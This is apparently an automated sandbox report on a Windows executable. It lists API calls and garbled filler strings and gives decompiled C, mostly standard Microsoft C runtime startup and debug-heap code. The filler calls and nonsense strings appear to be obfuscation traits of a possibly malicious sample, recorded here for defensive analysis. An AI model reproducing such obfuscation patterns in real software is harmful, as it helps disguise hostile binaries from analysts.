                            • CancelDeviceWakeupRequest.KERNEL32(00000000), ref: 0040A117
                            • FindFirstVolumeA.KERNEL32(00000000,00000000), ref: 0040A121
                            • GetLastError.KERNEL32 ref: 0040A16A
                            • GetCharWidthA.GDI32(00000000,00000000,00000000,00000000), ref: 0040A178
                            • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 0040A189
                            • WinHttpConnect.WINHTTP(00000000,00000000,00000000,00000000), ref: 0040A193
                            • AlphaBlend.MSIMG32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0040A1AA
                            • GetComputerNameW.KERNEL32 ref: 0040A1EC
                            • TlsFree.KERNEL32(00000000), ref: 0040A241
                            • WriteConsoleOutputCharacterA.KERNEL32(00000000,fowatigahugucuxociwoviwimojubijutuponovevayixogacapilibilewar,00000000,?,?), ref: 0040A262
                            • LoadLibraryW.KERNEL32(00000000), ref: 0040A26A
                            • DeleteAtom.KERNEL32(00000000), ref: 0040A272
                            • GetModuleHandleW.KERNEL32(gosiwosateyecehoconorexowugufexacedawasihulinidicuduforudanituf), ref: 0040A279
                            • GetPrivateProfileStringA.KERNEL32(Diboh yinanisowog himahasakiy,Firekax,Riyepulota paraxuvudacenu pufu dulanomusonidi,?,00000000,Zilayayumaxavo cigay riki nujudod), ref: 0040A296
                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0040A29E
                            Strings
                            • Firekax, xrefs: 0040A28C
                            • Jesotu lohi yixikonajiz direximoyuvat, xrefs: 0040A2F4
                            • fowatigahugucuxociwoviwimojubijutuponovevayixogacapilibilewar, xrefs: 0040A25C
                            • guwigejebapugitecu, xrefs: 0040A375
                            • yuvipebeyuyumudog, xrefs: 0040A511
                            • tumohozexicavuvicu, xrefs: 0040A37A
                            • Riyepulota paraxuvudacenu pufu dulanomusonidi, xrefs: 0040A287
                            • Zilayayumaxavo cigay riki nujudod, xrefs: 0040A27B
                            • Diboh yinanisowog himahasakiy, xrefs: 0040A291
                            • Noyucamirohanic, xrefs: 0040A2F9
                            • Fev getejey wuzihege, xrefs: 0040A33E
                            • Nevubos mapasis, xrefs: 0040A457
                            • wirerulaniwojujicuwuk, xrefs: 0040A0F4
                            • z<B, xrefs: 0040A3F7
                            • yazelazelewepubizopatumofo, xrefs: 0040A37F
                            • z<B, xrefs: 0040A3FD
                            • gosiwosateyecehoconorexowugufexacedawasihulinidicuduforudanituf, xrefs: 0040A274
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: Console$AliasesCharacterCriticalFileFindFreeLengthOpenOutputProcessSectionVolumeWrite$AffinityAliasAlphaApisAtomBinaryBlendCancelCharComputerConnectDeleteDeviceEnterEnvironmentErrorExesFirstFormatHandleHttpInitializeLastLibraryLoadMappingMaskModuleMountNameNextNumberParametersPointPriorityPrivateProfileReadRequestShutdownStringStringsThreadTimerTypeWaitableWakeupWidth
                            • String ID: Diboh yinanisowog himahasakiy$Fev getejey wuzihege$Firekax$Jesotu lohi yixikonajiz direximoyuvat$Nevubos mapasis$Noyucamirohanic$Riyepulota paraxuvudacenu pufu dulanomusonidi$Zilayayumaxavo cigay riki nujudod$fowatigahugucuxociwoviwimojubijutuponovevayixogacapilibilewar$gosiwosateyecehoconorexowugufexacedawasihulinidicuduforudanituf$guwigejebapugitecu$tumohozexicavuvicu$wirerulaniwojujicuwuk$yazelazelewepubizopatumofo$yuvipebeyuyumudog$z<B$z<B
                            • API String ID: 4025127805-761215093
                            • Opcode ID: f6b2113d507cda223c11083bd89e58f8dfb1338d5ac33396f5dff8f6b6e73b79
                            • Instruction ID: 6e06df7f2d5ddad14332fe3f035d07c2b71cf0429cc995c6fc8f00633ed79f9d
                            • Opcode Fuzzy Hash: f6b2113d507cda223c11083bd89e58f8dfb1338d5ac33396f5dff8f6b6e73b79
                            • Instruction Fuzzy Hash: 16E10275694300BBE314ABA0DE4AF9A77A4AB4CB02F144439F745BD1F0CBF464448B6E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 65%
                            			E0040B3A5() {
                            				void* _t21;
                            				void* _t22;
                            				void* _t25;
                            				intOrPtr _t27;
                            				void* _t29;
                            				intOrPtr _t34;
                            				void* _t44;
                            				void* _t46;
                            				void* _t54;
                            				void* _t56;
                            				void* _t58;
                            				void* _t60;
                            				void* _t61;
                            				void* _t62;
                            
                            				 *((intOrPtr*)(_t58 - 4)) = 0xfffffffe;
                            				 *((intOrPtr*)(_t58 - 0x6c)) = E0040B540();
                            				_t21 = E00412960(_t46, 1); // executed
                            				_t61 = _t60 + 4;
                            				if(_t21 == 0) {
                            					E0040B510(0x1c);
                            					_t61 = _t61 + 4; // executed
                            				}
                            				_t22 = L00410300(_t46); // executed
                            				if(_t22 == 0) {
                            					E0040B510(0x10);
                            					_t61 = _t61 + 4;
                            				}
                            				_push(1);
                            				E0040D930(_t46);
                            				_t62 = _t61 + 4;
                            				E004128E0();
                            				 *((intOrPtr*)(_t58 - 4)) = 1;
                            				_t25 = E00411520(); // executed
                            				if(_t25 < 0) {
                            					L0040FBE0(_t44, _t46, _t54, _t56, 0x1b);
                            					_t62 = _t62 + 4;
                            				}
                            				 *0x63457c = GetCommandLineA(); // executed
                            				_t27 = E004126C0(_t44, _t54, _t56); // executed
                            				 *0x6328f0 = _t27;
                            				if(E00412230() < 0) {
                            					L0040FBE0(_t44, _t46, _t54, _t56, 8);
                            					_t62 = _t62 + 4; // executed
                            				}
                            				_t29 = E00412090(_t44, _t56); // executed
                            				if(_t29 < 0) {
                            					L0040FBE0(_t44, _t46, _t54, _t56, 9);
                            					_t62 = _t62 + 4;
                            				}
                            				 *((intOrPtr*)(_t58 - 0x64)) = E0040FAC0(_t46, 1);
                            				if( *((intOrPtr*)(_t58 - 0x64)) != 0) {
                            					L0040FBE0(_t44,  *((intOrPtr*)(_t58 - 0x64)), _t54, _t56,  *((intOrPtr*)(_t58 - 0x64)));
                            				}
                            				 *((intOrPtr*)(_t58 - 0x68)) = E00411FC0();
                            				if(( *(_t58 - 0x34) & 0x00000001) == 0) {
                            					 *(_t58 - 0x7c) = 0xa;
                            				} else {
                            					 *(_t58 - 0x7c) =  *(_t58 - 0x30) & 0x0000ffff;
                            				}
                            				 *((intOrPtr*)(_t58 - 0x70)) = E00409FD0(0x400000, 0,  *((intOrPtr*)(_t58 - 0x68)),  *(_t58 - 0x7c));
                            				if( *((intOrPtr*)(_t58 - 0x6c)) == 0) {
                            					E0040FB60( *((intOrPtr*)(_t58 - 0x70)));
                            				}
                            				E0040FBA0();
                            				 *((intOrPtr*)(_t58 - 4)) = 0xfffffffe;
                            				_t34 =  *((intOrPtr*)(_t58 - 0x70));
                            				 *[fs:0x0] =  *((intOrPtr*)(_t58 - 0x10));
                            				return _t34;
                            			}

















                            0x0040b3a5
                            0x0040b3b1
                            0x0040b3b6
                            0x0040b3bb
                            0x0040b3c0
                            0x0040b3c4
                            0x0040b3c9
                            0x0040b3c9
                            0x0040b3cc
                            0x0040b3d3
                            0x0040b3d7
                            0x0040b3dc
                            0x0040b3dc
                            0x0040b3df
                            0x0040b3e1
                            0x0040b3e6
                            0x0040b3e9
                            0x0040b3ee
                            0x0040b3f5
                            0x0040b3fc
                            0x0040b400
                            0x0040b405
                            0x0040b405
                            0x0040b40e
                            0x0040b413
                            0x0040b418
                            0x0040b424
                            0x0040b428
                            0x0040b42d
                            0x0040b42d
                            0x0040b430
                            0x0040b437
                            0x0040b43b
                            0x0040b440
                            0x0040b440
                            0x0040b44d
                            0x0040b454
                            0x0040b45a
                            0x0040b45f
                            0x0040b467
                            0x0040b470
                            0x0040b47b
                            0x0040b472
                            0x0040b476
                            0x0040b476
                            0x0040b496
                            0x0040b49d
                            0x0040b4a3
                            0x0040b4a3
                            0x0040b4a8
                            0x0040b4ad
                            0x0040b4f5
                            0x0040b4fb
                            0x0040b509

                            APIs
                            • _check_managed_app.LIBCMTD ref: 0040B3AC
                            • __heap_init.LIBCMTD ref: 0040B3B6
                              • Part of subcall function 00412960: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,0040B3BB,00000001), ref: 00412976
                            • _fast_error_exit.LIBCMTD ref: 0040B3C4
                              • Part of subcall function 0040B510: ___crtExitProcess.LIBCMTD ref: 0040B534
                            • _fast_error_exit.LIBCMTD ref: 0040B3D7
                            • __RTC_Initialize.LIBCMTD ref: 0040B3E9
                            • GetCommandLineA.KERNEL32 ref: 0040B408
                            • ___crtGetEnvironmentStringsA.LIBCMTD ref: 0040B413
                            • ___setargv.LIBCMTD ref: 0040B41D
                            • __setenvp.LIBCMTD ref: 0040B430
                            • __cinit.LIBCMTD ref: 0040B445
                            • __wincmdln.LIBCMTD ref: 0040B462
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: ___crt_fast_error_exit$CommandCreateEnvironmentExitHeapInitializeLineProcessStrings___setargv__cinit__heap_init__setenvp__wincmdln_check_managed_app
                            • String ID: /O
                            • API String ID: 302379156-273608944
                            • Opcode ID: d5e072fd8c8145967f226f0ce9de3e5f4ee9250c8ab4bb83f9e65715555c2b4e
                            • Instruction ID: af04b444be07bec19f09f45fe591d543eb0f40a2eb329e9db3971630fc6ffd7c
                            • Opcode Fuzzy Hash: d5e072fd8c8145967f226f0ce9de3e5f4ee9250c8ab4bb83f9e65715555c2b4e
                            • Instruction Fuzzy Hash: 253174B1D003099AEB10BBF2A90279E76B0EB4434CF14413EE905BA2C3F7B955558A9E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 179 40b707-40b718 180 40b71a-40b728 179->180 181 40b76f-40b77e 179->181 182 40b760-40b769 180->182 183 40b72a-40b731 call 40c9e0 180->183 184 40b780-40b789 181->184 185 40b78c-40b793 181->185 182->181 193 40b733-40b751 call 40e1a0 183->193 194 40b754-40b75e 183->194 184->185 187 40b78b 184->187 188 40b795-40b7b8 185->188 189 40b80a-40b816 185->189 187->185 188->189 200 40b7ba-40b7be 188->200 191 40b818-40b820 189->191 192 40b829-40b82d 189->192 191->192 195 40b822 191->195 196 40b85c-40b868 192->196 197 40b82f-40b84b call 412f90 192->197 193->194 213 40b753 193->213 194->181 195->192 202 40b8a4-40b8b1 call 412ed0 196->202 203 40b86a-40b86e 196->203 210 40b84d 197->210 211 40b84e-40b857 197->211 205 40b7c0-40b7e0 call 412f90 200->205 206 40b7e5-40b802 call 412f90 200->206 216 40b8b6-40b8c0 202->216 203->202 208 40b870-40b87c 203->208 226 40b7e2 205->226 227 40b7e3 205->227 228 40b804 206->228 229 40b805 206->229 208->202 215 40b87e-40b882 208->215 210->211 218 40ba42-40ba6f call 40ba50 211->218 213->194 215->202 220 40b884-40b8a1 call 412f90 215->220 221 40b8d0-40b8e3 216->221 222 40b8c2-40b8cb 216->222 220->202 238 40b8a3 220->238 223 40b8e5-40b929 221->223 224 40b92e-40b93a 221->224 222->218 231 40b9e8-40ba3f call 412d20 * 3 223->231 232 40b93c-40b94b 224->232 233 40b94d 224->233 226->227 227->229 228->229 229->218 231->218 236 40b957-40b970 232->236 233->236 240 40b972-40b978 236->240 241 40b97e-40b985 236->241 238->202 240->241 243 40b994-40b997 241->243 244 40b987-40b992 241->244 246 40b99d-40b9e2 243->246 244->246 246->231
                            C-Code - Quality: 61%
                            			E0040B707() {
                            				signed int _t79;
                            				signed int _t80;
                            				intOrPtr _t81;
                            				signed int _t97;
                            				void* _t102;
                            				void* _t103;
                            				signed int _t105;
                            				void* _t109;
                            				void* _t110;
                            				intOrPtr _t112;
                            				void* _t115;
                            				void* _t116;
                            				signed int _t122;
                            				signed int _t123;
                            				intOrPtr _t126;
                            				signed int _t127;
                            				signed int _t157;
                            				intOrPtr _t158;
                            				intOrPtr _t159;
                            				signed int _t169;
                            				signed int _t170;
                            				void* _t171;
                            				void* _t173;
                            				void* _t175;
                            				void* _t177;
                            				void* _t178;
                            				void* _t188;
                            				void* _t192;
                            
                            				_t178 = _t177 + 4;
                            				 *(_t175 - 4) = 0;
                            				if( *0x63291c > 0) {
                            					_t112 =  *0x63291c; // 0x0
                            					_t188 =  *0x632904 - _t112 - 1; // 0x0
                            					if(_t188 != 0) {
                            						_t169 =  *0x632904; // 0x0
                            						_t170 = _t169 + 1;
                            						__eflags = _t170;
                            						 *0x632904 = _t170;
                            					} else {
                            						if(E0040C9E0() == 0) {
                            							_push(L"_CrtCheckMemory()");
                            							_push(0);
                            							_push(0x179);
                            							_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgheap.c");
                            							_push(2);
                            							_t115 = L0040E1A0();
                            							_t178 = _t178 + 0x14;
                            							if(_t115 == 1) {
                            								asm("int3");
                            							}
                            						}
                            						 *0x632904 = 0;
                            					}
                            				}
                            				_t79 =  *0x60a65c; // 0x34
                            				 *(_t175 - 0x28) = _t79;
                            				if( *0x60a660 != 0xffffffff) {
                            					_t192 =  *(_t175 - 0x28) -  *0x60a660; // 0xffffffff
                            					if(_t192 == 0) {
                            						asm("int3");
                            					}
                            				}
                            				if( *0x60ad74 == 0) {
                            					L19:
                            					__eflags = ( *(_t175 + 0xc) & 0x0000ffff) - 2;
                            					if(( *(_t175 + 0xc) & 0x0000ffff) != 2) {
                            						_t105 =  *0x60a654; // 0x1
                            						__eflags = _t105 & 0x00000001;
                            						if((_t105 & 0x00000001) == 0) {
                            							 *(_t175 - 0x1c) = 1;
                            						}
                            					}
                            					__eflags =  *((intOrPtr*)(_t175 + 8)) - 0xffffffbc;
                            					if( *((intOrPtr*)(_t175 + 8)) <= 0xffffffbc) {
                            						__eflags = ( *(_t175 + 0xc) & 0x0000ffff) - 4;
                            						if(( *(_t175 + 0xc) & 0x0000ffff) != 4) {
                            							__eflags =  *(_t175 + 0xc) - 1;
                            							if( *(_t175 + 0xc) != 1) {
                            								__eflags = ( *(_t175 + 0xc) & 0x0000ffff) - 2;
                            								if(( *(_t175 + 0xc) & 0x0000ffff) != 2) {
                            									__eflags =  *(_t175 + 0xc) - 3;
                            									if( *(_t175 + 0xc) != 3) {
                            										_t102 = L00412F90(1, 0, 0, 0, "%s", "Error: memory allocation: bad memory block type.\n");
                            										_t178 = _t178 + 0x18;
                            										__eflags = _t102 - 1;
                            										if(_t102 == 1) {
                            											asm("int3");
                            										}
                            									}
                            								}
                            							}
                            						}
                            						 *((intOrPtr*)(_t175 - 0x2c)) =  *((intOrPtr*)(_t175 + 8)) + 0x24;
                            						_t80 = E00412ED0(_t116, _t171, _t173,  *((intOrPtr*)(_t175 - 0x2c))); // executed
                            						 *(_t175 - 0x24) = _t80;
                            						__eflags =  *(_t175 - 0x24);
                            						if( *(_t175 - 0x24) != 0) {
                            							_t122 =  *0x60a65c; // 0x34
                            							_t123 = _t122 + 1;
                            							 *0x60a65c = _t123;
                            							__eflags =  *(_t175 - 0x1c);
                            							if( *(_t175 - 0x1c) == 0) {
                            								__eflags = (_t123 | 0xffffffff) -  *0x6328fc -  *((intOrPtr*)(_t175 + 8));
                            								if((_t123 | 0xffffffff) -  *0x6328fc <=  *((intOrPtr*)(_t175 + 8))) {
                            									 *0x6328fc = 0xffffffff;
                            								} else {
                            									_t159 =  *0x6328fc; // 0x2be9
                            									 *0x6328fc = _t159 +  *((intOrPtr*)(_t175 + 8));
                            								}
                            								_t81 =  *0x632914; // 0x1987
                            								 *0x632914 = _t81 +  *((intOrPtr*)(_t175 + 8));
                            								_t126 =  *0x632914; // 0x1987
                            								__eflags = _t126 -  *0x632908; // 0x1b9b
                            								if(__eflags > 0) {
                            									_t158 =  *0x632914; // 0x1987
                            									 *0x632908 = _t158;
                            								}
                            								__eflags =  *0x63290c;
                            								if( *0x63290c == 0) {
                            									 *0x632900 =  *(_t175 - 0x24);
                            								} else {
                            									_t97 =  *0x63290c; // 0x22e2718
                            									 *(_t97 + 4) =  *(_t175 - 0x24);
                            								}
                            								_t127 =  *0x63290c; // 0x22e2718
                            								 *( *(_t175 - 0x24)) = _t127;
                            								 *( *(_t175 - 0x24) + 4) = 0;
                            								 *( *(_t175 - 0x24) + 8) =  *(_t175 + 0x10);
                            								 *((intOrPtr*)( *(_t175 - 0x24) + 0xc)) =  *((intOrPtr*)(_t175 + 0x14));
                            								 *((intOrPtr*)( *(_t175 - 0x24) + 0x10)) =  *((intOrPtr*)(_t175 + 8));
                            								 *( *(_t175 - 0x24) + 0x14) =  *(_t175 + 0xc);
                            								 *( *(_t175 - 0x24) + 0x18) =  *(_t175 - 0x28);
                            								 *0x63290c =  *(_t175 - 0x24);
                            							} else {
                            								 *( *(_t175 - 0x24)) = 0;
                            								 *( *(_t175 - 0x24) + 4) = 0;
                            								 *( *(_t175 - 0x24) + 8) = 0;
                            								 *((intOrPtr*)( *(_t175 - 0x24) + 0xc)) = 0xfedcbabc;
                            								 *((intOrPtr*)( *(_t175 - 0x24) + 0x10)) =  *((intOrPtr*)(_t175 + 8));
                            								 *( *(_t175 - 0x24) + 0x14) = 3;
                            								 *( *(_t175 - 0x24) + 0x18) = 0;
                            							}
                            							E00412D20(_t171,  *(_t175 - 0x24) + 0x1c,  *0x60a664 & 0x000000ff, 4);
                            							E00412D20(_t171,  *(_t175 - 0x24) +  *((intOrPtr*)(_t175 + 8)) + 0x20,  *0x60a664 & 0x000000ff, 4);
                            							E00412D20(_t171,  *(_t175 - 0x24) + 0x20,  *0x60a667 & 0x000000ff,  *((intOrPtr*)(_t175 + 8)));
                            							_t157 =  *(_t175 - 0x24) + 0x20;
                            							__eflags = _t157;
                            							 *(_t175 - 0x20) = _t157;
                            						} else {
                            							 *((intOrPtr*)( *((intOrPtr*)(_t175 + 0x18)))) = 0xc;
                            						}
                            					} else {
                            						_t103 = L00412F90(1, 0, 0, 0, "Invalid allocation size: %Iu bytes.\n",  *((intOrPtr*)(_t175 + 8)));
                            						__eflags = _t103 - 1;
                            						if(_t103 == 1) {
                            							asm("int3");
                            						}
                            						 *((intOrPtr*)( *((intOrPtr*)(_t175 + 0x18)))) = 0xc;
                            					}
                            					L46:
                            					 *(_t175 - 4) = 0xfffffffe;
                            					E0040BA50();
                            					 *[fs:0x0] =  *((intOrPtr*)(_t175 - 0x10));
                            					return  *(_t175 - 0x20);
                            				}
                            				_t109 =  *0x60ad74(1, 0,  *((intOrPtr*)(_t175 + 8)),  *(_t175 + 0xc),  *(_t175 - 0x28),  *(_t175 + 0x10),  *((intOrPtr*)(_t175 + 0x14)));
                            				_t178 = _t178 + 0x1c;
                            				if(_t109 != 0) {
                            					goto L19;
                            				}
                            				if( *(_t175 + 0x10) == 0) {
                            					_t110 = L00412F90(0, 0, 0, 0, "%s", "Client hook allocation failure.\n");
                            					__eflags = _t110 - 1;
                            					if(_t110 == 1) {
                            						asm("int3");
                            					}
                            					L18:
                            					goto L46;
                            				}
                            				_push( *((intOrPtr*)(_t175 + 0x14)));
                            				if(L00412F90(0, 0, 0, 0, "Client hook allocation failure at file %hs line %d.\n",  *(_t175 + 0x10)) == 1) {
                            					asm("int3");
                            				}
                            				goto L18;
                            			}































                            0x0040b707
                            0x0040b70a
                            0x0040b718
                            0x0040b71a
                            0x0040b722
                            0x0040b728
                            0x0040b760
                            0x0040b766
                            0x0040b766
                            0x0040b769
                            0x0040b72a
                            0x0040b731
                            0x0040b733
                            0x0040b738
                            0x0040b73a
                            0x0040b73f
                            0x0040b744
                            0x0040b746
                            0x0040b74b
                            0x0040b751
                            0x0040b753
                            0x0040b753
                            0x0040b751
                            0x0040b754
                            0x0040b754
                            0x0040b728
                            0x0040b76f
                            0x0040b774
                            0x0040b77e
                            0x0040b783
                            0x0040b789
                            0x0040b78b
                            0x0040b78b
                            0x0040b789
                            0x0040b793
                            0x0040b80a
                            0x0040b813
                            0x0040b816
                            0x0040b818
                            0x0040b81d
                            0x0040b820
                            0x0040b822
                            0x0040b822
                            0x0040b820
                            0x0040b829
                            0x0040b82d
                            0x0040b865
                            0x0040b868
                            0x0040b86a
                            0x0040b86e
                            0x0040b879
                            0x0040b87c
                            0x0040b87e
                            0x0040b882
                            0x0040b896
                            0x0040b89b
                            0x0040b89e
                            0x0040b8a1
                            0x0040b8a3
                            0x0040b8a3
                            0x0040b8a1
                            0x0040b882
                            0x0040b87c
                            0x0040b86e
                            0x0040b8aa
                            0x0040b8b1
                            0x0040b8b9
                            0x0040b8bc
                            0x0040b8c0
                            0x0040b8d0
                            0x0040b8d6
                            0x0040b8d9
                            0x0040b8df
                            0x0040b8e3
                            0x0040b937
                            0x0040b93a
                            0x0040b94d
                            0x0040b93c
                            0x0040b93c
                            0x0040b945
                            0x0040b945
                            0x0040b957
                            0x0040b95f
                            0x0040b964
                            0x0040b96a
                            0x0040b970
                            0x0040b972
                            0x0040b978
                            0x0040b978
                            0x0040b97e
                            0x0040b985
                            0x0040b997
                            0x0040b987
                            0x0040b987
                            0x0040b98f
                            0x0040b98f
                            0x0040b9a0
                            0x0040b9a6
                            0x0040b9ab
                            0x0040b9b8
                            0x0040b9c1
                            0x0040b9ca
                            0x0040b9d3
                            0x0040b9dc
                            0x0040b9e2
                            0x0040b8e5
                            0x0040b8e8
                            0x0040b8f1
                            0x0040b8fb
                            0x0040b905
                            0x0040b912
                            0x0040b918
                            0x0040b922
                            0x0040b922
                            0x0040b9f9
                            0x0040ba16
                            0x0040ba31
                            0x0040ba3c
                            0x0040ba3c
                            0x0040ba3f
                            0x0040b8c2
                            0x0040b8c5
                            0x0040b8c5
                            0x0040b82f
                            0x0040b840
                            0x0040b848
                            0x0040b84b
                            0x0040b84d
                            0x0040b84d
                            0x0040b851
                            0x0040b851
                            0x0040ba42
                            0x0040ba42
                            0x0040ba49
                            0x0040ba61
                            0x0040ba6f
                            0x0040ba6f
                            0x0040b7ad
                            0x0040b7b3
                            0x0040b7b8
                            0x00000000
                            0x00000000
                            0x0040b7be
                            0x0040b7f7
                            0x0040b7ff
                            0x0040b802
                            0x0040b804
                            0x0040b804
                            0x0040b805
                            0x00000000
                            0x0040b805
                            0x0040b7c3
                            0x0040b7e0
                            0x0040b7e2
                            0x0040b7e2
                            0x00000000

                            APIs
                            Strings
                            • f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c, xrefs: 0040B73F
                            • Client hook allocation failure at file %hs line %d., xrefs: 0040B7C8
                            • Client hook allocation failure., xrefs: 0040B7E5
                            • _CrtCheckMemory(), xrefs: 0040B733
                            • Invalid allocation size: %Iu bytes., xrefs: 0040B833
                            • Error: memory allocation: bad memory block type., xrefs: 0040B884
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: _memset$CheckMemory__heap_alloc_base
                            • String ID: Client hook allocation failure at file %hs line %d.$Client hook allocation failure.$Error: memory allocation: bad memory block type.$Invalid allocation size: %Iu bytes.$_CrtCheckMemory()$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
                            • API String ID: 4254127243-2462871736
                            • Opcode ID: e15f57ee2bb5276fc63ace693c11738e8e2135de48e24e98766bc685c23bdff2
                            • Instruction ID: 8a72b64e3570234d7f27825fba9996bada962f4722e9e02e9a4984fbd7bf526b
                            • Opcode Fuzzy Hash: e15f57ee2bb5276fc63ace693c11738e8e2135de48e24e98766bc685c23bdff2
                            • Instruction Fuzzy Hash: 4EA18CB4A00209DFDB14DF45D991BAA77F2EB48304F24C16AE9146B3E1D379AD40CFA9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 250 411520-4115ba GetStartupInfoA call 40bb40 254 4115c4-4115d7 250->254 255 4115bc-4115bf 250->255 257 4115e2-4115ef 254->257 256 4119aa-4119bb 255->256 258 4115f1-41164d 257->258 259 41164f-411655 257->259 258->257 261 411853-411869 259->261 262 41165b-41165f 259->262 267 41199b-4119a8 SetHandleCount 261->267 268 41186f-411884 261->268 262->261 264 411665-411686 262->264 265 411693 264->265 266 411688-411691 264->266 269 41169d-4116ad 265->269 266->269 267->256 270 411892-41189d 268->270 271 411886-41188c 268->271 274 4116b8-4116c1 269->274 272 4118ab-4118b8 270->272 273 41189f-4118a9 270->273 271->270 275 411984-411993 271->275 276 4118be-4118d2 GetStdHandle 272->276 273->276 278 411783-41178a 274->278 279 4116c7-4116e6 call 40bb40 274->279 277 411996 275->277 280 411969-41197c 276->280 281 4118d8-4118dc 276->281 277->267 282 4117a7-4117ad 278->282 291 4116f5-41170f 279->291 292 4116e8-4116f0 279->292 284 411982 280->284 281->280 285 4118e2-4118f3 GetFileType 281->285 282->261 286 4117b3-4117b9 282->286 284->277 285->280 288 4118f5-411909 285->288 289 4117bf-4117c5 286->289 290 41184e 286->290 293 41190b-41191b 288->293 294 41191d-411929 288->294 289->290 295 4117cb-4117d4 289->295 290->282 296 41171a-41172c 291->296 292->278 298 41193b-411951 call 417180 293->298 294->298 300 41192b-411938 294->300 295->290 299 4117d6-4117df 295->299 301 41177e 296->301 302 41172e-41177c 296->302 310 411953-411956 298->310 311 411958-411967 298->311 306 4117f1-411835 call 417180 299->306 307 4117e1-4117ef GetFileType 299->307 300->298 301->274 302->296 313 411837-41183a 306->313 314 41183f-41184b 306->314 307->290 307->306 310->256 311->284 313->256 314->290
                            C-Code - Quality: 93%
                            			E00411520() {
                            				void* _v8;
                            				signed int _v12;
                            				char _v20;
                            				intOrPtr _v28;
                            				struct _STARTUPINFOA _v100;
                            				signed int _v104;
                            				signed int _v108;
                            				signed int _v112;
                            				int _v116;
                            				signed char* _v120;
                            				void* _v124;
                            				void** _v128;
                            				void** _v132;
                            				int _v140;
                            				long _v144;
                            				signed int _t166;
                            				signed int _t170;
                            				signed int _t175;
                            				signed int _t188;
                            				signed int _t206;
                            				void** _t209;
                            				signed int _t321;
                            				void* _t322;
                            				intOrPtr _t323;
                            				void* _t324;
                            
                            				_push(0xfffffffe);
                            				_push(0x425330);
                            				_push(E0040E610);
                            				_push( *[fs:0x0]);
                            				_t323 = _t322 + 0xffffff84;
                            				_t166 =  *0x60a7a4; // 0x859ba81c
                            				_v12 = _v12 ^ _t166;
                            				_push(_t166 ^ _t321);
                            				 *[fs:0x0] =  &_v20;
                            				_v28 = _t323;
                            				_v8 = 0;
                            				GetStartupInfoA( &_v100);
                            				_v8 = 0xfffffffe;
                            				_t170 = L0040BB40(0x20, 0x40, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\ioinit.c", 0x88); // executed
                            				_t324 = _t323 + 0x14;
                            				_v128 = _t170;
                            				if(_v128 != 0) {
                            					 *0x633440 = _v128;
                            					 *0x633420 = 0x20;
                            					while(_v128 <  *0x633440 + 0x800) {
                            						_v128[1] = 0;
                            						 *_v128 = 0xffffffff;
                            						_v128[1] = 0xa;
                            						_v128[2] = 0;
                            						_v128[9] = _v128[9] & 0x00000080;
                            						_v128[9] = _v128[9] & 0x0000007f;
                            						_v128[9] = 0xa;
                            						_v128[9] = 0xa;
                            						_v128[0xe] = 0;
                            						_v128[0xd] = 0;
                            						_v128 =  &(_v128[0x10]);
                            					}
                            					if((_v100.cbReserved2 & 0x0000ffff) == 0 || _v100.lpReserved2 == 0) {
                            						L34:
                            						_v112 = 0;
                            						while(_v112 < 3) {
                            							_v128 = (_v112 << 6) +  *0x633440;
                            							if( *_v128 == 0xffffffff ||  *_v128 == 0xfffffffe) {
                            								_v128[1] = 0x81;
                            								if(_v112 != 0) {
                            									asm("sbb edx, edx");
                            									_v144 =  ~(_v112 - 1) + 0xfffffff5;
                            								} else {
                            									_v144 = 0xfffffff6;
                            								}
